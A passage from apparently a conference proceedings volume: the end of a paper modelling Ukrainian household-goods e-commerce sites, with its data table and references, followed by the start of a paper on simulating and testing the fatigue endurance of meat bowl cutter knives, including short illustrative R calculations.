The results and analytical conclusions of the modeling will increase the financial performance of the business and improve marketing activities. The study is of practical importance for the market of household goods, as well as for all other types of goods sold on online platforms. It proves the effectiveness and usefulness of data science tools in e-commerce and demonstrates the importance of evaluating Internet platforms when forming a marketing and e-commerce strategy. The issue of processing the accumulated data remains relevant and requires diverse research. The possibilities of using data science tools in e-commerce analysis are a key area for attracting customers, expanding business and increasing revenue.
Appendix A
Table A1. Descriptive statistics of the studied data set. Source: own evaluation

| № | Name of site | Income (X1) | Income per month (X2) | Marginality (X3) | Visitors (X4) | Av. price per unit (X5) | Conversion (X6) | Complexity (X7) | Units (X8) | Transactions (X9) |
|---|---|---|---|---|---|---|---|---|---|---|
| 1 | allo.ua | 223,770 | 31,967 | 84 | 11,152,580 | 25.85 | 15 | 1.7985 | 8,658 | 4,814 |
| 2 | aquamarket.com | 361,151 | 51,593 | 85 | 844,240 | 24.3 | 16 | 2.2535 | 14,862 | 6,595 |
| 3 | atbmarket.ua | 1,096,617 | 156,660 | 85 | 661,860 | 39.94 | 9 | 1.54 | 27,456 | 17,829 |
| 4 | auchan.ua | 494,238 | 70,605 | 84 | 1,889,040 | 26.16 | 11 | 1.7747 | 18,895 | 10,647 |
| 5 | avrora.ua | 457,750 | 65,393 | 82 | 2,359,240 | 25.9 | 8 | 1.7785 | 17,677 | 9,939 |
| 6 | bdzilka.com | 1,217,189 | 173,884 | 89 | 7,964,460 | 48.55 | 5 | 1.282 | 25,071 | 19,556 |
| 7 | bigsale.com | 391,644 | 55,949 | 85 | 2,077,240 | 33.53 | 8 | 1.4424 | 11,679 | 8,097 |
| 8 | brain.com | 226,804 | 32,401 | 84 | 729,280 | 25.2 | 13 | 1.8641 | 9,000 | 4,828 |
| 9 | chems.com | 374,277 | 53,468 | 87 | 1,025,660 | 33.05 | 13 | 1.7286 | 11,326 | 6,552 |
| 10 | decapusta.com | 405,015 | 57,859 | 85 | 2,432,640 | 33.83 | 7 | 1.3375 | 11,971 | 8,950 |
| 11 | dom.ua | 381,933 | 54,562 | 86 | 1,281,360 | 35.32 | 11 | 1.484 | 10,814 | 7,287 |
| 12 | ecomarket.ua | 295,000 | 42,143 | 84 | 1,247,460 | 25.48 | 10 | 1.8157 | 11,577 | 6,376 |
| 13 | emir.ua | 363,746 | 51,964 | 84 | 1,356,840 | 25.57 | 11 | 1.8249 | 14,227 | 7,796 |
| 14 | epicentr.ua | 2,423,111 | 346,159 | 86 | 3,970,840 | 38.47 | 7 | 1.5197 | 62,982 | 41,443 |
| 15 | euro-opt.shop | 274,659 | 39,237 | 74 | 1,559,660 | 46.9 | 6 | 1.2893 | 5,856 | 4,542 |
| 16 | eva.ua | 582,580 | 83,226 | 87 | 3,307,160 | 44.56 | 7 | 1.2024 | 13,074 | 10,873 |
| 17 | flagma.ua | 286,903 | 40,986 | 86 | 2,932,740 | 37.7 | 4 | 1.3044 | 7,610 | 5,834 |
| 18 | fora.ua | 215,001 | 30,714 | 85 | 1,796,940 | 29.7 | 6 | 1.3142 | 7,240 | 5,509 |
| 19 | foxtrot.com | 1,648,388 | 235,484 | 87 | 8,417,200 | 35.67 | 8 | 1.4228 | 46,215 | 32,481 |
| 20 | fozzy.com | 1,053,715 | 150,531 | 84 | 4,110,020 | 37.58 | 9 | 1.5407 | 28,041 | 18,200 |
| 21 | glass.ua | 402,916 | 57,559 | 85 | 1,943,420 | 32.12 | 10 | 1.3163 | 12,544 | 9,530 |
| 22 | gotoshop.ua | 479,030 | 68,433 | 86 | 3,541,500 | 38.66 | 5 | 1.3178 | 12,391 | 9,403 |
| 23 | grass.su | 224,012 | 32,002 | 83 | 505,600 | 24.9 | 18 | 1.9476 | 8,998 | 4,620 |
| 24 | hotline.ua | 283,393 | 40,485 | 83 | 858,780 | 26.59 | 14 | 1.8101 | 10,658 | 5,888 |
| 25 | hozsklad.ua | 489,983 | 69,998 | 86 | 2,846,640 | 37.06 | 7 | 1.32 | 13,221 | 10,016 |
| 26 | ibud.ua | 205,757 | 29,394 | 83 | 834,860 | 24.39 | 12 | 1.7551 | 8,437 | 4,807 |
| 27 | ikea.com | 863,950 | 123,421 | 87 | 5,046,780 | 45.28 | 6 | 1.2872 | 19,081 | 14,824 |
| 28 | infomisto.com | 1,079,309 | 154,187 | 84 | 4,072,380 | 35.99 | 9 | 1.639 | 29,989 | 18,297 |
| 29 | jooble.org | 191,271 | 27,324 | 86 | 1,938,440 | 35.22 | 4 | 1.2532 | 5,430 | 4,333 |
| 30 | kalambus.com | 396,713 | 56,673 | 84 | 2,286,380 | 39.7 | 6 | 1.3485 | 9,994 | 7,411 |
| 31 | kamerton.com | 1,123,570 | 160,510 | 84 | 5,291,300 | 35.32 | 9 | 1.4044 | 31,807 | 22,648 |
| 32 | kishenya.ua | 118,862 | 29,716 | 83 | 499,860 | 25.17 | 10 | 1.8335 | 4,723 | 2,576 |
| 33 | kolos.ua | 432,823 | 61,832 | 87 | 3,005,820 | 33.99 | 6 | 1.3328 | 12,732 | 9,553 |
| 34 | kopiechka.ua | 1,114,030 | 159,147 | 87 | 7,672,460 | 42.95 | 5 | 1.3772 | 25,939 | 18,835 |
| 35 | kran.com | 760,743 | 108,678 | 86 | 2,112,300 | 36.94 | 11 | 1.7537 | 20,594 | 11,743 |
| 36 | lotok.ua | 260,064 | 37,152 | 86 | 1,515,760 | 30.41 | 9 | 1.2722 | 8,552 | 6,722 |
| 37 | magnit.ua | 177,451 | 25,350 | 83 | 858,240 | 24.09 | 10 | 1.7801 | 7,366 | 4,138 |
| 38 | marker.net | 405,065 | 57,866 | 86 | 2,840,040 | 31.13 | 7 | 1.3197 | 13,014 | 9,861 |
| 39 | mavenclean.com | 1,480,882 | 211,555 | 87 | 9,547,520 | 37.45 | 6 | 1.4407 | 39,543 | 27,448 |
| 40 | mayevskiy.com | 443,801 | 63,400 | 86 | 3,178,740 | 31.2 | 6 | 1.4353 | 14,224 | 9,910 |
| 41 | metro.ua | 2,654,074 | 379,153 | 85 | 2,147,780 | 34.74 | 36 | 1.9698 | 76,398 | 38,785 |
| 42 | milanshop.com | 794,700 | 113,529 | 87 | 4,253,280 | 44.56 | 7 | 1.2547 | 17,834 | 14,214 |
| 43 | nikol.ua | 1,096,618 | 156,660 | 88 | 8,835,300 | 45.04 | 5 | 1.216 | 24,349 | 20,024 |
| 44 | novus.ua | 1,403,391 | 200,484 | 85 | 5,331,920 | 35.56 | 10 | 1.499 | 39,466 | 26,329 |
| 45 | octava-market.com | 439,232 | 62,747 | 86 | 2,543,360 | 34.73 | 8 | 1.3032 | 12,646 | 9,704 |
| 46 | office-mix.com | 975,483 | 139,355 | 88 | 3,561,780 | 39.16 | 9 | 1.5676 | 24,909 | 15,890 |
| 47 | opter.com | 544,486 | 77,784 | 85 | 2,804,900 | 35.95 | 8 | 1.3325 | 15,144 | 11,365 |
| 48 | pampik.com | 182,987 | 26,141 | 84 | 720,440 | 27.76 | 10 | 1.7886 | 6,591 | 3,685 |
| 49 | panama.ua | 388,856 | 55,551 | 85 | 2,609,680 | 34.44 | 7 | 1.2756 | 11,290 | 8,851 |
| 50 | papiorus.ua | 472,078 | 67,440 | 85 | 1,357,980 | 34.06 | 13 | 1.5732 | 13,860 | 8,810 |
| 51 | pobut.com | 204,600 | 29,229 | 82 | 673,240 | 24.6 | 14 | 1.8066 | 8,316 | 4,603 |
| 52 | podushka.com | 871,532 | 124,505 | 89 | 1,729,600 | 66.29 | 11 | 1.4326 | 13,147 | 9,177 |
| 53 | portal.com | 172,357 | 24,622 | 86 | 8,717,240 | 31.98 | 1 | 1.3564 | 5,389 | 3,973 |
| 54 | prom.ua | 559,496 | 79,928 | 86 | 2,732,660 | 33.99 | 8 | 1.4332 | 16,459 | 11,484 |
| 55 | miele.ua | 1,763,621 | 251,946 | 84 | 6,019,840 | 35.94 | 10 | 1.6579 | 49,066 | 29,595 |
| 56 | prostor.ua | 1,413,256 | 201,894 | 87 | 5,296,920 | 40.08 | 10 | 1.3884 | 35,258 | 25,394 |
| 57 | royal.com | 232,725 | 33,246 | 81 | 913,380 | 33.95 | 10 | 1.5541 | 6,855 | 4,411 |
| 58 | rozetka.ua | 495,505 | 70,786 | 86 | 1,373,300 | 35.13 | 14 | 1.484 | 14,104 | 9,504 |
| 59 | sangig.com | 228,570 | 32,653 | 84 | 1,394,660 | 30.73 | 8 | 1.3606 | 7,437 | 5,466 |
| 60 | sawash.com | 1,360,941 | 194,420 | 86 | 5,532,200 | 39.2 | 8 | 1.5225 | 34,717 | 22,802 |
| 61 | sfera.ua | 352,976 | 50,425 | 86 | 2,038,460 | 31.62 | 8 | 1.2916 | 11,162 | 8,642 |
| 62 | shafa.ua | 526,262 | 75,180 | 86 | 2,006,780 | 35.65 | 10 | 1.5226 | 14,763 | 9,696 |
| 63 | silpo.com | 160,178 | 22,883 | 82 | 713,760 | 24.25 | 10 | 1.8567 | 6,606 | 3,558 |
| 64 | simi.ua | 237,355 | 33,908 | 78 | 357,660 | 31.87 | 25 | 1.6897 | 7,448 | 4,408 |
| 65 | skladchistoti.ua | 434,045 | 62,006 | 84 | 1,868,240 | 33.25 | 10 | 1.3827 | 13,054 | 9,441 |
| 66 | stera.ua | 656,673 | 93,810 | 86 | 2,708,720 | 31.86 | 11 | 1.386 | 20,608 | 14,869 |
| 67 | topolyok.ua | 664,340 | 94,906 | 86 | 714,160 | 34.32 | 30 | 1.8066 | 19,359 | 10,716 |
| 68 | toscana.ua | 171,785 | 24,541 | 82 | 903,960 | 25.98 | 8 | 1.9447 | 6,612 | 3,400 |
| 69 | vroda.ua | 302,628 | 43,233 | 86 | 2,144,880 | 31.52 | 7 | 1.3089 | 9,601 | 7,335 |
| 70 | watsons.ua | 359,618 | 51,374 | 85 | 1,758,300 | 34.65 | 9 | 1.3025 | 10,380 | 7,969 |
| 71 | zacupca.com | 633,359 | 90,480 | 86 | 3,802,980 | 43.45 | 6 | 1.3587 | 14,578 | 10,729 |
| 72 | zapmeta.ua | 801,687 | 114,527 | 84 | 3,382,500 | 37.27 | 9 | 1.4058 | 21,512 | 15,302 |
References
Akter, S., Wamba, S.F.: Big data analytics in e-commerce: a systematic review and agenda for future research. Electron. Mark. 26(2), 173–194 (2016). https://doi.org/10.1007/s12525-016-0219-0
Alrumiah, S.S., Hadwan, M.: Implementing big data analytics in e-commerce: vendor and customer view. IEEE Access 9, 37281–37286 (2021). https://doi.org/10.1109/ACCESS.2021.3063615
Amazon: First Quarter Results (2020). https://press.aboutamazon.com/news-releases/news-release-details/amazoncom-announces-first-quarter-results
Cheng, Y., Yang, Y., Jiang, J., Xu, G.C.: Cluster analysis of e-commerce sites with data mining approach. Int. J. Database Theory Appl. 8(3), 343–354 (2015). http://dx.doi.org/10.14257/ijdta.2015.8.3.30
Deloitte: COVID-19 Will Permanently Change E-Commerce (2020). https://www2.deloitte.com/content/dam/Deloitte/dk/Documents/strategy/e-commerce-covid-19-onepage.pdf
Dluhopolskyi, O., Simakhova, A., Zatonatska, T., Oleksiv, I., Kozlovskyi, S.: Potential of virtual reality in the current digital society: economic perspectives. In: 11th International Conference on Advanced Computer Information Technologies, Deggendorf, Germany, pp. 360–363 (2021)
E-commerce. EVO (2021). https://evo.business
Fedirko, O., Zatonatska, T., Dluhopolskyi, O., Londar, S.: The impact of e-commerce on the sustainable development: case of Ukraine, Poland, and Austria. In: IOP Conference Series: Earth and Environmental Science, vol. 915. International Conference on Environmental Sustainability in Natural Resources Management, Odesa, Ukraine (2021). https://iopscience.iop.org/article/10.1088/1755-1315/915/1/012023
Forbes: How COVID-19 Is Transforming E-Commerce (2020). https://www.forbes.com/sites/louiscolumbus/2020/04/28/how-covid-19-is-transforming-e-commerce/?sh=56742aba3544
Kovtoniuk, K., Molchanova, E., Dluhopolskyi, O., Weigang, G., Piankova, O.: The factors' analysis of influencing the development of digital trade in the leading countries. In: 11th International Conference on Advanced Computer Information Technologies, Deggendorf, Germany, pp. 290–293 (2021)
Malhotra, D., Rishi, O.: An intelligent approach to design of e-commerce metasearch and ranking system using next-generation big data analytics. J. King Saud Univ. – Comput. Inf. Sci. 33(2), 183–194 (2021). https://doi.org/10.1016/j.jksuci.2018.02.015
Mykhalchuk, T., Zatonatska, T., Dluhopolskyi, O., Zhukovska, A., Dluhopolska, T., Liakhovych, L.: Development of recommendation system in e-commerce using emotional analysis and machine learning methods. In: 11th IEEE International Conference on Intelligent Data Acquisition and Advanced Computing Systems: Technology and Applications (IDAACS), Cracow, Poland, vol. 1, pp. 527–535 (2021)
Naur, P.: Concise Survey of Computer Methods. Studentlitteratur, Lund (1975)
Panchenko, O., Klochko, A., Dluhopolskyi, O., Klochko, O., Shchurova, V., Peker, A.: Impact of the COVID-19 pandemic on the development of artificial intelligence: challenges for the human rights. In: 11th International Conference on Advanced Computer Information Technologies, Deggendorf, Germany, pp. 744–747 (2021)
Rymarczyk, T., et al.: Comparison of machine learning methods in electrical tomography for detecting moisture in building walls. Energies 14(2777), 1–22 (2021). https://doi.org/10.3390/en14102777
Statista: Retail E-Commerce Sales Worldwide from 2014 to 2024 (2021). https://www.statista.com/statistics/379046/worldwide-retail-e-commerce-sales
Wang, Q., Cai, R., Zhao, M.: E-commerce brand marketing based on FPGA and machine learning. Microprocess. Microsyst. 103446 (2020). https://doi.org/10.1016/j.micpro.2020.103446
Yue, Y.S., Li, B.: E-commerce platform and exports performance of Chinese manufacturing enterprises – empirical evidence based on big data from Alibaba. China Industr. Econ. 8, 97–115 (2018)
Zatonatska, T., Dluhopolskyi, O.: Modelling the efficiency of the cloud computing implementation at enterprises. Mark. Manage. Innov. 3, 45–59 (2019)
Zatonatska, T., Dluhopolskyi, O., Bobro, O.: Development of electronic payment systems in the structure of e-commerce in the Visegrad Group and Ukraine. In: Krysovatyy, A., Shengelia, T. (eds.) Visegrad Group: A Form of Establishment and Development of European Integration: Coll. Monograph, pp. 96–112. TSU, Tbilisi (2021)
Zatonatska, T., Dluhopolskyi, O., Chyrak, I., Kotys, N.: The internet and e-commerce diffusion in European countries (modeling at the example of Austria, Poland, and Ukraine). Innov. Mark. 15(1), 66–75 (2019)
Zatonatska, T., Suslenko, V., Dluhopolskyi, O., Brych, V., Dluhopolska, T.: Investment models on centralized and decentralized cryptocurrency markets. Naukovyi Visnyk Natsionalnoho Hirnychoho Universytetu 1, 177–182 (2022). https://doi.org/10.33271/nvngu/2022-1/177
Zhuravka, F., Filatova, H., Šuleř, P., Wołowiec, T.: State debt assessment and forecasting: time series analysis. Invest. Manage. Financ. Innov. 18(1), 65–75 (2021). https://doi.org/10.21511/imfi.18(1).2021.06
Computer Modeling in Physical and Chemical Processes
Simulation of Influence of Constructive Parameters of Meat Bowl Cutter Knives on Their Endurance at Alternating Oscillations Olexandr Batrachenko Cherkasy State Technological University, Cherkasy, Ukraine [email protected]
Abstract. The aim of the work is to study by numerical methods the dependence of the endurance limit of bowl cutter knives on their design parameters. The SolidWorks software (Simulation module) has been used to determine the endurance limit of bowl cutter blades. Six types of knife design, those most often used in modern models of bowl cutters, are studied. To ensure a high endurance limit of bowl cutter knives, it is very important to use rounding or chamfers on their back face. Rounding in the form of a vertical ellipse (+17% endurance) is the most effective, but such geometry worsens the manufacturability of the knife and therefore raises its price. A chamfer of C = 2 mm increases endurance by 16%, and rounding with a radius of R = 2.5 mm increases it by 15%. Keywords: Bowl cutter · knives · durability · fatigue strength
1 Introduction Increasing the efficiency of cutter knives has been the central task of many scientific works, with researchers' main attention drawn to increasing the wear resistance of knives. The practice of meat processing, however, indicates the need to focus on other aspects of the performance of these parts – static strength, fatigue endurance and impact strength. An analysis of cutter operation points to the acute problem of the reliability of the main working parts – the knives. Insufficient knife quality can lead to sudden failures during cutter operation. When knives fail (the cost of one knife from European manufacturers reaches 120–350 euros), the raw meat in the cutter bowl (120–750 l) becomes unsuitable for further use, the bowl and the cover of the cutter head are damaged, and there is a risk of failure of the cutter shaft bearing and of the shaft itself due to a significant increase in the unbalance of the cutter head. As a result, the cutter is out of service for a long time and requires a significant amount of repair work, which ultimately leads to significant material losses for the meat processing plant. Previous studies by the author of this article and by other researchers indicate the fatigue character of the destruction of the overwhelming majority of knives broken during
cutting. It is therefore relevant to substantiate effective ways of increasing the fatigue endurance of cutter knives. The static strength of cutter knives has been studied in many scientific works, for example in [1]. However, the presented results do not allow us to identify all the main factors that lead to the destruction of knives, nor do they outline effective ways to increase knife strength and reliability, since the influence of alternating loads on the durability of knives was not taken into account in these works. According to the studies presented in [2–4], the character of knife fracture indicates the fatigue nature of their destruction. At the same time, the fatigue endurance of cutter knives has not been studied thoroughly in known works, and there are no works in which highly effective ways to increase the fatigue endurance of knives are proposed and substantiated. The problem of fatigue fracture of metals is described quite fully in [5]. The authors of [6] note the extremely important role of the choice of material grade, the type and modes of its heat treatment, and the quality of the metal surface in ensuring high fatigue strength. The paper presents a fundamental study of the features of corrosion-fatigue destruction of machine parts. It is noted in [7] that a corrosive medium significantly (up to several times) reduces the fatigue strength of metals; preliminary corrosive exposure, for example during storage of parts, also significantly reduces strength. In [8], the fatigue properties of an aluminum silicon-magnesium alloy AlSi10Mg obtained by additive manufacturing are studied, the high-cycle fatigue (HCF) resistance is simulated in the presence of defects, and the fatigue limit of the material is predicted. Three batches of samples are studied using X-ray microcomputed tomography and tested under fatigue conditions. A lower-boundary resistance curve is obtained, which takes into account artificial defects of a size corresponding to the largest defects that occur in practice. It is concluded that fracture mechanics modelling is clearly the tool needed to support the application of additive manufacturing to safety-critical components. The authors of [9] have studied the effect of mean stress on the fatigue life and fatigue limit of 316 stainless steel. The results for prestressed samples show that fatigue life is almost the same in the same strain range, regardless of stress amplitude, maximum peak stress and mean strain. The decrease in fatigue life is caused by a change in the effective strain range, brought about by an increase in the minimum peak stress and strain. The article [10] provides a review and systematization of studies on the fatigue crack propagation threshold in metals as a design criterion, discussing both its experimental determination and its application to components. In both of these areas, new questions have been raised that may challenge or change previously known data.
The authors of [11] describe the use of data analysis tools to predict the fatigue strength of steels. Several approaches have been used to establish correlations between various alloy properties, their composition, and manufacturing process parameters. Data-driven approaches are of considerable interest to materials engineers, especially for extreme properties such as cyclic fatigue, where current physics-based models have serious limitations. The results have shown that several advanced data analysis techniques, such as neural networks, decision trees and multivariate polynomial regression, can significantly improve prediction accuracy compared to previously known studies, confirming the usefulness of such data mining tools for predicting the fatigue strength of steels and for building predictive models. In the article [12], the authors propose a fracture mechanics model for predicting the S-N characteristics of metal components with large microstructural defects, for plates made of aluminum alloys Al 2024-T3 and Al 7075-T6, as well as ductile iron EN-GJS-400-18-LT. The authors identify high levels of applied stress, coupled with the potential for multiple cracks, as the likely root of the problem, and propose a scheme to extend the model to account for crack initiation. The work [13] is devoted to predicting the fatigue limit of notched specimens. The endurance limit of notched specimens is determined by the condition of non-propagation of mechanically short surface cracks, as well as by the applied nominal stress for which the condition of contact between the crack driving force and the resistance force is satisfied. The approach has been modified to include ductility effects in the mechanically short crack mode, and it has been applied to normal and high-strength steel for an infinite plate with a round hole under remote tensile stress. The high efficiency of this method has been confirmed. The article [14] reviews the literature on the fatigue strength of parts made of AlSi10Mg and Ti6Al4V alloys using additive technologies, taking into account their sensitivity to defects and inhomogeneities. The results have shown that the fatigue properties and key factors (heat treatment effect, defect size) are very similar to those of parts obtained by traditional manufacturing processes. These results confirm that damage-tolerant design concepts can also be adopted for AM components. In [15], it is shown that an effective way to increase the fatigue strength of parts is strengthening surface treatment. The use of chemical-thermal treatment [16], surface plastic deformation and treatment with concentrated energy sources makes it possible to increase the fatigue endurance of parts by more than 3 times. Based on the analysis of well-known publications, the author of this article has concluded that it is relevant to study the effectiveness of using high-frequency mechanical forging [17] and pulse-plasma strengthening [18] to increase the fatigue endurance of cutter knives. It is also relevant to study the influence of such design parameters of cutter knives as blade geometry, knife width and back face geometry on their endurance limit.
The solution of the above problems will significantly increase the durability of cutters and hence the profitability of their use in meat processing industries. Objective. The aim of the work is to substantiate, using numerical methods and an active experiment, new ways to increase the endurance limit of cutter knives by modifying their design and applying surface strengthening. Object of study: the endurance limit of cutter knives. Subject of study: regularities of the influence of the design parameters of cutter knives and of surface strengthening technologies on their endurance limit. To achieve this goal, the following tasks are set:
• to analyze well-known studies of the endurance limit of cutter knives and ways to increase it;
• to develop methods for studying the endurance limit of cutter knives by numerical methods and by conducting an active experiment;
• to reveal the patterns of influence of the design parameters of cutter knives and of surface strengthening technologies on their endurance limit;
• to suggest ways to increase the endurance limit of cutter knives.
Research methodology. Since, according to the defined research tasks, both numerical modelling and experimental studies are necessary, the research methods are divided into two groups.
2 Materials and Methods To simulate the operation of knives under alternating loads and determine the endurance limit of cutter knives, the SolidWorks software package, in particular its Simulation module, is used. SolidWorks Simulation is a finite element analysis environment integrated with SolidWorks CAD. It is designed for mathematical modelling of common types of physical phenomena: it allows calculating the stress-strain state of structures under time-constant applied forces and under impact loads, and performing frequency analysis, endurance (fatigue) analysis, etc. The modelling of cutter knife operation under alternating loads has been carried out in the following stages (Fig. 1):
1) construction of three-dimensional models of the objects under study (SolidWorks 3D models of the knives most commonly used in practice);
2) assignment of the material grade of the model (alloyed steel, yield strength 620 MPa; this value corresponds to steel grade N680, widely used by manufacturers for cutter knives);
3) generation of the computational mesh (tetrahedral elements; relative mesh size 0.05; mesh improvement radius 5; surface mesh smoothing level 3);
4) specification of the model fixation;
5) specification of the types of loads (cutting forces, pressure of raw materials on the side surface of the knife due to the feed of raw materials by the cutter bowl, centrifugal forces) and their values;
6) execution of the calculation in automatic mode;
7) saving the calculation results in a report and analyzing them.
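For orientation, the stress-life idea underlying such a fatigue analysis can be illustrated with a toy calculation; this is not the SolidWorks algorithm, and the S-N curve constants below are assumed for illustration only.

```r
# Toy illustration of the stress-life idea behind a fatigue analysis (not the
# SolidWorks algorithm): invert an assumed Basquin-type S-N curve S = a * N^b
# to estimate cycles to failure from the peak alternating stress found by the
# static solution.
a <- 1500    # curve coefficient, MPa (assumed)
b <- -0.1    # curve exponent (assumed)

cycles_to_failure <- function(s_alt) (s_alt / a)^(1 / b)

cycles_to_failure(450)   # about 1.7e5 cycles for a 450 MPa alternating stress
```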
Fig. 1. Statement of the problem in the study of the endurance of cutter knives
We have studied 6 types of knife design (Fig. 2) most commonly used in modern models of cutters (maximum radius 300 mm, thickness h = 5 mm). The knives of the presented types belong to cutters of the following brands: type I – Seydelmann; types II and III – Laska; type IV – Kilia; type V – Alpina; type VI – L5-FKB. The varied factors are (Fig. 3): the geometric shape of the blade and of the back edge of the knife, the radius of the rounding of the back edge (R = 0.5; 1.0; 1.5; 2.0; 2.5 mm), the size of the chamfer on the back face (C = 0.5; 1.0; 1.5; 2.0; 2.5 mm), a horizontal ellipse of 6.25 × 2.5 mm or 4.00 × 2.5 mm, and a vertical ellipse of 2.5 × 1.5 mm.
3 Experiments The study of the endurance limit of cutter knives is carried out in accordance with the Ukrainian standard DSTU 2546-94 "Calculation and testing for strength. Methods for testing metal materials fatigue under high-cycle load conditions". Samples are tested continuously until a crack of a given size forms, until complete destruction, or until the base number of cycles is reached. During the tests, the stability of the set loads (deformations) is controlled. To plot the durability distribution curve and estimate the mean value and standard deviation of the logarithm of durability at a given stress level, a series of at least 10 identical samples is tested until complete destruction or the formation of macrocracks. The test base for determining the endurance limit is taken as 10⁷ cycles. We have used cantilever fixation of the samples, which are made in the form of plates, and a symmetrical deformation cycle. For this purpose, we have used the vibrating electrodynamic unit VEDS-200A (Fig. 4), intended for testing products
Fig. 2. Knife design schemes most often used in practice: (a) type I; (b) type II; (c) type III; (d) type IV; (e) type V; (f) type VI; R is the largest radius of the knife's cutting edge; ω is the direction of rotation of the knife relative to the raw material being cut; 1, 2 are the zones of the highest stresses in the knife body and of fatigue crack initiation
for vibration strength and vibration resistance in laboratory and production conditions. The technical characteristics are as follows: pushing force – 2,000 N; frequency range – 5–5,000 Hz; vibration acceleration without load – 392 m/s²; vibration acceleration with maximum load – 39 m/s²; maximum mass of the tested products – 45 kg; maximum power consumption – 5 kW; cooling – air. The prototypes are made in the form of 5 mm thick plates (Fig. 5) from N680 steel, which is most often used in the manufacture of cutter knives. The samples have the appropriate heat treatment and surface quality. Based on the results obtained, a fatigue curve (Wöhler curve) is constructed; least-squares approximation is used (a minimal fitting sketch is given after Fig. 5 below). The influence of such surface strengthening methods as pulse-plasma treatment and high-frequency mechanical forging is studied. Pulse-plasma hardening has been carried out on the "IMPULS" installation of the laboratory of the E.O. Paton Electric Welding Institute of the National Academy of Sciences of Ukraine. The installation operation scheme is shown in Fig. 6. The detonation plasma generator consists of a detonation chamber 1, where a combustible gas mixture is formed and its combustion is initiated in the detonation mode, coaxial electrodes 2 and 3, and power supplies.
Fig. 3. Geometric parameters of cutter knife and the zone of the highest stress concentration: 1) side view of the knife; 2) section of the knife; 3) rounding of the back edge of the knife with a radius R; 4) chamfers on the back face; 5) rounding of the back edge of the knife with a horizontal ellipse; 6) rounding of the back edge of the knife with a vertical ellipse; 1, 2 are zones of the highest stress concentration
Fig. 4. Vibrating electrodynamic unit VEDS-200A: (a) general view of the installation; (b) general view of the sample fixed in the grips of the installation
Gas-dynamic and electromagnetic forces are involved in accelerating the plasma formation. As a result of detonation, partially ionized combustion products enter the interelectrode gap 5 from the detonation chamber and close the R–L–C circuit of the power source, discharging the capacitor bank.
Fig. 5. Fatigue testing of the sample on the vibration stand VEDS-200A: (a) stationary sample; (b) deformation of the sample during vibrations; (c) fatigue cracks
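As noted above, the fatigue (Wöhler) curve is approximated by least squares. A minimal fitting sketch is shown below; Basquin's power-law form and all numeric values are assumptions for illustration, not the measured data of this study.

```r
# Hedged sketch of a least-squares fit of a fatigue (Woehler) curve, assuming
# Basquin's power law S = a * N^b, which becomes linear on log-log axes.
# "stress" (MPa) and "cycles" (to failure) are illustrative values only.
stress <- c(420, 390, 360, 330, 300, 280)
cycles <- c(4.1e4, 9.5e4, 2.3e5, 6.8e5, 2.1e6, 8.9e6)

fit <- lm(log10(stress) ~ log10(cycles))   # least-squares fit on log-log scale
b <- coef(fit)[2]
a <- 10^coef(fit)[1]

# Stress level expected to survive the 1e7-cycle test base:
a * 1e7^b
```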
Fig. 6. Scheme of the detonation generator: 1 – detonation chamber; 2, 3 – coaxial electrodes; 4 – consumable electrode; 5 – interelectrode gap; 6 – processing surface
A certain electrically conductive volume of gas 5, whose degree of ionization increases, flows between coaxial electrodes 2 and 3. When a current
flows through the plasma, Joule heat is released, a certain fraction of which contributes to the acceleration during the expansion of the heated volume of ionized gas. This further enhances the gas-dynamic component of the force. During the flow in the interelectrode gap 5, the plasma erodes the consumable electrode 4, saturating the plasma with alloying elements (W, Mo). The resulting plasma jet acts on the treated surface 6. When the plasma pulse interacts with the surface of the product, the electrical circuit between the central electrode and the surface of the product 6 closes, and a region of shock-compressed plasma appears in the contact zone. The knives are strengthened using the following processing modes: capacitance of the capacitor bank of the discharge circuit C = 800 μF; voltage on the plates of the capacitor bank U = 3.2 kV; discharge circuit inductance L = 30 μH; pulse initiation frequency υ = 2.5 Hz; electrode material – W. Strengthening by high-frequency mechanical forging has been carried out using the IPM (impulse peening machine) installation of the E.O. Paton Electric Welding Institute of the National Academy of Sciences of Ukraine (Fig. 7, a, b, c). The principle of operation of the IPM installation is to impart a high-frequency oscillatory movement to the head with strikers using a piezoceramic transducer. The strikers perform surface deformation of the metal layers (hardening), which improves the mechanical properties of the surface layer of the workpiece. The IPM unit has the following technical characteristics: mains voltage 220 V, power consumption 1.0 kW, maximum electrical power supplied to the tool 600 W, mechanical resonance frequency 20 ± 0.5 kHz, static tool pressing force 20–50 N, tool cooling – air, ultrasonic generator weight 5.0 kg, percussion tool weight 3.0 kg.
Fig. 7. Installation for surface strengthening by high-frequency mechanical forging: a) general view of the installation; b) reinforcement of fatigue test prototype; c) strengthening of the test specimen for impact testing
Figure 8 shows the appearance of a conventional sample and of samples surface-hardened by the above technological methods. A TIME 3221 profilometer has been used to control the effect of strengthening on the surface roughness of the samples. Its principle of operation is based on the movement of an inductive contact sensor along the surface whose parameters are measured. The device measures 40 profile parameters, including Ra, Rt, Rp, Rv, Rz, Rc, Rq, Rsk, Rku, RPc
Fig. 8. Appearance of prototypes for fatigue testing: (a) a standard sample; (b) superficially reinforced with vibro-hardening; (c) surface hardened by pulsed plasma treatment
and the like. The measurement range of the sensor needle is 400 μm. The radius of the measuring stylus is 5 μm; its material is a diamond needle, and the measuring force is 4 mN. The maximum traverse length is 19 mm. The evaluation lengths are 0.08 mm, 0.25 mm, 0.8 mm and 2.5 mm. Measurement accuracy is ±10%. The measurement results are stored in the device memory and can also be transferred to a personal computer via a USB connection. The hardness of the prototypes has been measured using a TK-2M hardness tester (Rockwell scale) and a TSh-2 hardness tester (Brinell scale). Considering the high rotational speeds of knives in modern models of cutters (up to 100 s⁻¹) and the periodic (impact) nature of the contact of knives with raw materials, it is relevant to study the effect of surface hardening treatment on the impact strength of knives. The impact strength of the prototypes has been measured using an MK-30A pendulum impact tester. The methodology for measuring impact strength complies with the Ukrainian standard DSTU ISO 9016:2008 "Destructive testing of welded joints, metallic materials. Impact bending tests. Location of the test specimen, notch on the specimens, test report". Type V specimens have been made (Fig. 9), with a repeatability of 5 samples of each type. The energy of the pendulum in the initial (h0) and final (h1) positions is noted, after which the energy difference is determined:

W = Q(h1 − h0),   (1)

where Q is the weight of the pendulum. The value of impact toughness is then calculated as

a = W/A,   (2)

where A is the area of the weakened cross-section of the test sample.
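A worked numeric example of Eqs. (1)–(2) is sketched below; all input values are assumed for illustration, not measurements from this study.

```r
# Worked numeric sketch of Eqs. (1)-(2); every input value here is assumed.
Q  <- 150    # pendulum weight, N (assumed)
h0 <- 0.20   # initial pendulum position, m (assumed)
h1 <- 0.60   # final pendulum position, m (assumed)
A  <- 0.8    # weakened cross-section area, cm^2 (assumed)

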